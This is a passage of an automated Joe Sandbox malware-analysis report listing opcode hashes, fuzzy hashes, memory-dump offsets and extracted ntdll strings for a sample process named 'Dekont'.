                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction ID: e44fc0c7403963e3a379c1f333d3b85c061221a641f9589d4198857513c45f0e
                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction Fuzzy Hash: DAD05E36511A50AFC3329F1BEE04D13BBF9FBC4B10705066FE54683920C671E806DBA0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction ID: cec3ec74f900a52bc10832382d9a11b935c60986c5a4236728a48b2b3b79d5d0
                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction Fuzzy Hash: ADD0A932204A60ABD772AA1CFC08FC333E8AB88724F1604A9B009C7051C364EC81CA84
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction ID: e2f73fbc7c321d6a3bb0c2ee39195b585ba3beaa2b1ad236ae0b1b34f4c3fff9
                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction Fuzzy Hash: 7CE08C75900680ABCF52EF59CA84F4ABBF5BB84B00F180498A1486B661C228ED00DB40
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: 208f1a26385a2e06d591bfb675aa7fd4f0876844a0a346ef3cfefde51f152afd
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 47D0223321607193CB2856656E08F6379059B80BA8F2A006C340BA3800C0088C42F6E0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction ID: 47902786c9a8756b1a45bfc0605a71a4857d0808dbdff43c1e84237faa17311e
                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction Fuzzy Hash: 46D012371D054CBBCB119F66DC06F957BA9E754BA0F544020B505875A1C63AE950D584
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96af0f16425a7c5357343ea942f21762c8feb28471699fadc3092d666c1d1f0d
                                  • Instruction ID: 5f798a8f708466448316e96153020b4344c8ce15e322e288cbb6b1bf4f855aab
                                  • Opcode Fuzzy Hash: 96af0f16425a7c5357343ea942f21762c8feb28471699fadc3092d666c1d1f0d
                                  • Instruction Fuzzy Hash: 6BD05E309010418BEF27CB48CA5892E36B0EB44640F4000F8FA8152120D72AD9418A10
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: a2dd2152bd6013bd9f6ca5e0dfd5f9af34eabae9c375b9f0a90e5fee8b9ae6b8
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 5FD09235612A80CFC61A8B09C5A8B1533E8BB84B44F8544A0E541CBB21DA6CD980CA00
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 97f9381a4366f65f36aba33dccc0de18c5aa3680a80a27c18cd7e5377e6337e3
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: 73C08C33290688AFC712EF99DD06F027BE9EB98B40F100061F3058B671C635FD20EA84
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: 4fb7baa3e62328aaa65705b19ca45ea59ba95f86c64565750c39bf10d8d7047c
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: D9D0123610024CEFCB01DF41C890DAA772AFFC8710F108019FD19076118A35ED62DA50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: 3f8f3f3bcfcf4f3b798b05c9e316faa0f64baec5b6e56dffbc88f4ea6a8c3a3d
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: 20C08C343005488FCF11CB1AC688F0433E0F740300F1008C0E800CB722E224E801CA00
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd2bd03f3dd3e33c7d49b96a129e2a8e0da217dbc579a25a96447444418e2b1d
                                  • Instruction ID: f40af1057f9331e411b886d7537eb00076bae495ecc6524b4066e1a73b88996e
                                  • Opcode Fuzzy Hash: cd2bd03f3dd3e33c7d49b96a129e2a8e0da217dbc579a25a96447444418e2b1d
                                  • Instruction Fuzzy Hash: 9490023560581012A140715888855464045A7E0301B55C013E0824554CCE148A565361
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7134538066ddab907692986ab770bed6c4d1cb459e55a4b4cffc70cf66c0f0b6
                                  • Instruction ID: ee4865604a52eb024d824982ae5cda61b528ef9dfc486b6dc3977b86a24750a2
                                  • Opcode Fuzzy Hash: 7134538066ddab907692986ab770bed6c4d1cb459e55a4b4cffc70cf66c0f0b6
                                  • Instruction Fuzzy Hash: CA900265601510425140715888054066045A7E1301395C117E0954560CCA1889559369
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d113fc634169caf5b9d713bd0eb4212e1255c53a0c651f14393ed81749acd868
                                  • Instruction ID: 68a055a1dceaa2e933a323fb5475e065e3d1b06f08df22ca2cc2a7be3ab6e07c
                                  • Opcode Fuzzy Hash: d113fc634169caf5b9d713bd0eb4212e1255c53a0c651f14393ed81749acd868
                                  • Instruction Fuzzy Hash: 7B90023520141802E10471588805686004597D0301F55C013E6424655EDA6589917231
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7ffd1ebfd6c91d67825cc6ba198cd9eaa92f69895009c7ace6a51d579d91fdf
                                  • Instruction ID: 259e81b68a6b48f41d7ce458a2debcdc52364e8246820a5606b45c6e5e33021b
                                  • Opcode Fuzzy Hash: e7ffd1ebfd6c91d67825cc6ba198cd9eaa92f69895009c7ace6a51d579d91fdf
                                  • Instruction Fuzzy Hash: 9590023560541802E15071588415746004597D0301F55C013E0424654DCB558B5577A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3bbbe0bb2c5b9cd2b57b5dce32ece0f8a53f38b77928f19079f5950c37be1ed7
                                  • Instruction ID: c10834e21a52301d81a96ac1992fc78372d21d417fc5bb9ce73c91aeb9593357
                                  • Opcode Fuzzy Hash: 3bbbe0bb2c5b9cd2b57b5dce32ece0f8a53f38b77928f19079f5950c37be1ed7
                                  • Instruction Fuzzy Hash: 7090023520545842E14071588405A46005597D0305F55C013E0464694DDA258E55B761
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 384f9a399981430a400e235c90e0474a39ec52269adf0339a6d4415f7c4a13fc
                                  • Instruction ID: dfcf5459d6ddba410fecb208dc18301059ec9d12b4a9cbce2706b03a896112a7
                                  • Opcode Fuzzy Hash: 384f9a399981430a400e235c90e0474a39ec52269adf0339a6d4415f7c4a13fc
                                  • Instruction Fuzzy Hash: FE9002A5201550925500B258C405B0A454597E0201B55C017E1454560CC92589519235
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cd2e77e301268609284f4c70d87cc84bb85c70c48b2c9e765a20881d7b97d2a
                                  • Instruction ID: 8930bbc56bf15ed24f3b879ab5a5efeb912abeab3d68ade51ee1e8531666634f
                                  • Opcode Fuzzy Hash: 3cd2e77e301268609284f4c70d87cc84bb85c70c48b2c9e765a20881d7b97d2a
                                  • Instruction Fuzzy Hash: 3F900229221410021145B558460550B0485A7D6351395C017F1816590CCA2189655321
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31ad2ce8c86b3128aed0c8efb622da17f8624a6967815a79b14799cf69c96948
                                  • Instruction ID: a566f87c4d72fd3645a037fbc2d283c930ca4c01af371de7ad2d994938e676a1
                                  • Opcode Fuzzy Hash: 31ad2ce8c86b3128aed0c8efb622da17f8624a6967815a79b14799cf69c96948
                                  • Instruction Fuzzy Hash: CA90022520545442E10075589409A06004597D0205F55D013E1464595DCA358951A231
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 643eee78aa51f15b21832bedd712d42ffa36adf1446b60981558ad691afab158
                                  • Instruction ID: b08358e654bcd53eb51a6aa1df11e8155d97bcba4fcd37fa17f319ebf85d3807
                                  • Opcode Fuzzy Hash: 643eee78aa51f15b21832bedd712d42ffa36adf1446b60981558ad691afab158
                                  • Instruction Fuzzy Hash: 6790023524141402E141715884056060049A7D0241F95C013E0824554ECA558B56AB61
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1699ada4a5185dfc5a67b7e2e542468d65139aee4e80b1f8e828cf49c679298
                                  • Instruction ID: 5bdf75643c09b24e62430329454503668f8277f0c41d117dca18915adb055a8c
                                  • Opcode Fuzzy Hash: b1699ada4a5185dfc5a67b7e2e542468d65139aee4e80b1f8e828cf49c679298
                                  • Instruction Fuzzy Hash: D990023520141842E10071588405B46004597E0301F55C017E0524654DCA15C9517621
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1ecfb6742826401dffc4b69df11b36629ceec2569fc074aaa8eabdbd8999b0d
                                  • Instruction ID: a1601939176bf862cb9ffd2582753b9af3d8c39ea058c6b347e3cb53d30b09df
                                  • Opcode Fuzzy Hash: b1ecfb6742826401dffc4b69df11b36629ceec2569fc074aaa8eabdbd8999b0d
                                  • Instruction Fuzzy Hash: 6290022560541402E14071589419706005597D0201F55D013E0424554DCA598B5567A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc322c05ffd400ccd1fbe7fff8753ac7596397478b8d274d593e9a95b83db663
                                  • Instruction ID: 6e027acde5452c15fad8be0e577ad2cf3e23ce7eec4f4d881f7acf4608a5f595
                                  • Opcode Fuzzy Hash: bc322c05ffd400ccd1fbe7fff8753ac7596397478b8d274d593e9a95b83db663
                                  • Instruction Fuzzy Hash: C490023520141403E10071589509707004597D0201F55D413E0824558DDA5689516221
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e66c29b72d3e1f7ddd55803e56d6c9117b2e1ee51216d5b601af61886df6c632
                                  • Instruction ID: 1572f4a534b08bee58f1dc42f2a94482db9f096e0d53a3ab042231f8e015eefc
                                  • Opcode Fuzzy Hash: e66c29b72d3e1f7ddd55803e56d6c9117b2e1ee51216d5b601af61886df6c632
                                  • Instruction Fuzzy Hash: 4990026521141042E10471588405706008597E1201F55C013E2554554CC9298D615225
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c085dc961f3cf0a4520a59bd8d034a8a4906d50796440be32dfa48cdab094a8e
                                  • Instruction ID: 88456a1e6594f462376ae443c9392f20f948cae3c4e17e4a2e5c201cacac5083
                                  • Opcode Fuzzy Hash: c085dc961f3cf0a4520a59bd8d034a8a4906d50796440be32dfa48cdab094a8e
                                  • Instruction Fuzzy Hash: 2790023520181402E10071588809747004597D0302F55C013E5564555ECA65C9916631
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6e439bc982f7b23181877ae8b3bf4b348c9ee9d3bc2af0d7da770d20137d698
                                  • Instruction ID: 55932979b362d7112ac556689190567d50f46e5bf5d7bb3d3568ee2c98c18e0e
                                  • Opcode Fuzzy Hash: b6e439bc982f7b23181877ae8b3bf4b348c9ee9d3bc2af0d7da770d20137d698
                                  • Instruction Fuzzy Hash: 8E90022530141402E102715884156060049D7D1345F95C013E1824555DCA258A53A232
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d819e72246d65d30cc2e6ffd8d022c851acf7f274857a84d4c60834eb8b288e
                                  • Instruction ID: 90658905438db41ec08453abe34d47d033b3a520e86f33465f037c490676d4f8
                                  • Opcode Fuzzy Hash: 1d819e72246d65d30cc2e6ffd8d022c851acf7f274857a84d4c60834eb8b288e
                                  • Instruction Fuzzy Hash: 1A90026520181403E14075588805607004597D0302F55C013E2464555ECE298D516235
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75226dbcac9d493af02052270a366b7cdfa12e4aee886860017449b45125491a
                                  • Instruction ID: ae84d1ae162918f72419807b969d12ce7ebde76cbf0eaf3ccb23051d0fef9778
                                  • Opcode Fuzzy Hash: 75226dbcac9d493af02052270a366b7cdfa12e4aee886860017449b45125491a
                                  • Instruction Fuzzy Hash: 5990022520185442E14072588805B0F414597E1202F95C01BE4556554CCD1589555721
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 250de4dd8bf728d07ae50d749a7de66e44f7efa21d3cf3fb7ac184ff6daf5243
                                  • Instruction ID: b51b7714fb439fe7e3cd30227d71ececed176fb28b74405ec71a60f3d39cbc76
                                  • Opcode Fuzzy Hash: 250de4dd8bf728d07ae50d749a7de66e44f7efa21d3cf3fb7ac184ff6daf5243
                                  • Instruction Fuzzy Hash: C790022524141802E1407158C4157070046D7D0601F55C013E0424554DCA168A6567B1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fa4cf5a11a327b20ce798ca52cf1545aa995a03e2184edcc6e7ae626cfa32a3
                                  • Instruction ID: f045bbabdf10b9e33660e929dc850e5c970431d518e08dd1f75342c03be27110
                                  • Opcode Fuzzy Hash: 7fa4cf5a11a327b20ce798ca52cf1545aa995a03e2184edcc6e7ae626cfa32a3
                                  • Instruction Fuzzy Hash: 9A90023560551402E10071588515706104597D0201F65C413E0824568DCB958A5166A2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb068e2d645bbc09f5a7976bfdcff8201aaa4abc953708db3b84dbf903988ae1
                                  • Instruction ID: 47f305b0bb127cca0859d81c51b04241c2f05c1b6f78568304fab87e634e8b48
                                  • Opcode Fuzzy Hash: fb068e2d645bbc09f5a7976bfdcff8201aaa4abc953708db3b84dbf903988ae1
                                  • Instruction Fuzzy Hash: 8490022524546102E150715C84056164045B7E0201F55C023E0C14594DC95589556321
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab1f2fdcdca7a92655153461e67b2987e914fcf7322e862453090bd043f1a5c5
                                  • Instruction ID: 0204eb7b6b7de87f10092e825dce7d3b4aca8fe32a92961c41b20fab02973c0f
                                  • Opcode Fuzzy Hash: ab1f2fdcdca7a92655153461e67b2987e914fcf7322e862453090bd043f1a5c5
                                  • Instruction Fuzzy Hash: 4490023520241142A54072589805A4E414597E1302B95D417E0415554CCD1489615321
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3f6658ab169afc5aa27b1c4200a262c30af5f5bb550b117866402303630f9f7
                                  • Instruction ID: b8874562eb4bff36267ff08e200b28a984c06d1873dd87f06ccdad6df5ebe9d9
                                  • Opcode Fuzzy Hash: e3f6658ab169afc5aa27b1c4200a262c30af5f5bb550b117866402303630f9f7
                                  • Instruction Fuzzy Hash: 7090023920141402E51071589805646008697D0301F55D413E0824558DCA5489A1A221
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: cd193d427c8bc54c9700bb562759cebafdfabd1fdf1b7ed8acb8218a8e9b6d98
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: b32c619902eebbbd55dadf80eed74b646b713a749d4d995aa676110a2ccbcf86
                                  • Instruction ID: 53d161d5ffbf7e0cbfea49449e3c852109b7df1b25fa92869e6673c5e1bc7405
                                  • Opcode Fuzzy Hash: b32c619902eebbbd55dadf80eed74b646b713a749d4d995aa676110a2ccbcf86
                                  • Instruction Fuzzy Hash: EB51D7B5A04216BFDB11DB9C89D097EFBF8BB48240B648169F4E5D7645D338DE408BE0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: c7b726cc4614239cfe5d6635eb14ea624900204c7db2f0ca260a3c6342134dc6
                                  • Instruction ID: a4bde7c2748c38a90a203bc6c1f8c293f5bb3596a3b828e87e894d278f9c9768
                                  • Opcode Fuzzy Hash: c7b726cc4614239cfe5d6635eb14ea624900204c7db2f0ca260a3c6342134dc6
                                  • Instruction Fuzzy Hash: 585116B5A48656AECB70EF5CC89097FBBF8EF44200B448469E4D6D3681EA74DA40C770
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01044787
                                  • ExecuteOptions, xrefs: 010446A0
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01044655
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01044742
                                  • Execute=1, xrefs: 01044713
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010446FC
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01044725
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 3caa63535a2b5efc7cd36c484625b5bef5e89455dc1e306c20554fe5af6396af
                                  • Instruction ID: 96ad50edc12b26db422a8ab3c87b8719ea4842a46c5ef21f5703d37fc3849703
                                  • Opcode Fuzzy Hash: 3caa63535a2b5efc7cd36c484625b5bef5e89455dc1e306c20554fe5af6396af
                                  • Instruction Fuzzy Hash: D7512C716002096AFF12DB68DC95BEE77A8BF18340F5400E9D5C5A71C1DB75AA418F51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
